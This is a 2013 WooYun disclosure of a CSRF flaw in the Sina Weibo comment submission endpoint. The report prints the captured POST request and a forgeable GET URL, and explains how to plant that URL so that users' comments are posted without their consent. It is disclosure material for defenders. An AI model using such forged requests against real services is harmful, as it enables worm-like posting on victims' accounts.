当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021729

漏洞标题:新浪微博某功能控制不严可导致蠕虫

相关厂商:新浪

漏洞作者: se55i0n

提交时间:2013-04-13 09:28

修复时间:2013-05-28 09:29

公开时间:2013-05-28 09:29

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-13: 细节已通知厂商并且等待厂商处理中
2013-04-13: 厂商已经确认,细节仅向厂商公开
2013-04-23: 细节向核心白帽子及相关领域专家公开
2013-05-03: 细节向普通白帽子公开
2013-05-13: 细节向实习白帽子公开
2013-05-28: 细节向公众公开

简要描述:

新浪微博某功能控制不严可导致蠕虫

详细说明:

1)存在问题的功能在:lady.weibo.com的评论处;

1.jpg


2)点击发布并抓包,得到如下数据;

POST /cmnt/submit HTTP/1.1
Host: comment5.news.sina.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://slide.eladies.sina.com.cn/fa/slide_3_41261_19668.html
Cookie: 
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 292
channel=shuo&newsid=slidenews-41261-277122&parent=B&content=very+nice&format=js&ispost=1&share_url=http%3A%2F%2Fslide.eladies.sina.com.cn%2Ffa%2Fslide_3_41261_19668.html%3Fimg%3D277122&video_url=&img_url=http%3A%2F%2Fwww.sinaimg.cn%2Fdy%2Fslidenews%2F3_img%2F2013_15%2F41261_277122_505214.jpg


3)系统校验了referer,但是发现居然可以直接发送GET请求;

http://comment5.news.sina.com.cn/cmnt/submit?channel=shuo&newsid=slidenews-41261-277122&parent=B&content=very+nice&format=js&ispost=1&share_url=http%3A%2F%2Fslide.eladies.sina.com.cn%2Ffa%2Fslide_3_41261_19668.html%3Fimg%3D277122&video_url=&img_url=http%3A%2F%2Fwww.sinaimg.cn%2Fdy%2Fslidenews%2F3_img%2F2013_15%2F41261_277122_505214.jpg


4)提交效果见下图;

2.jpg


5)在weibo发布上面的url请求,发现系统对GET请求也校验了referer;

5.jpg


6)但是我们可以将url发布在如下场景;

3.jpg


7)效果如下图,另外“share_url”和“image_url”参数貌似能够自己定义....

4.jpg

漏洞证明:

见详细说明

修复方案:

版权声明:转载请注明来源 se55i0n@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-04-13 12:24

厂商回复:

感谢关注新浪安全,已经安排人员进行修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-04-13 09:49 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    。。。霸气,恭喜你获得新浪大礼包一份

  2. 2013-04-13 10:03 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    mark

  3. 2013-04-13 14:19 | Pwfee ( 路人 | Rank:8 漏洞数:1 | iTeam团队)

    新浪大礼包一份?

  4. 2013-04-14 14:55 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:172 )

    @px1624 大个毛线的礼包呀,你收到新浪的礼物了?

  5. 2013-04-14 17:00 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @se55i0n ...我随便说说而已,你还真当真了,哈哈~~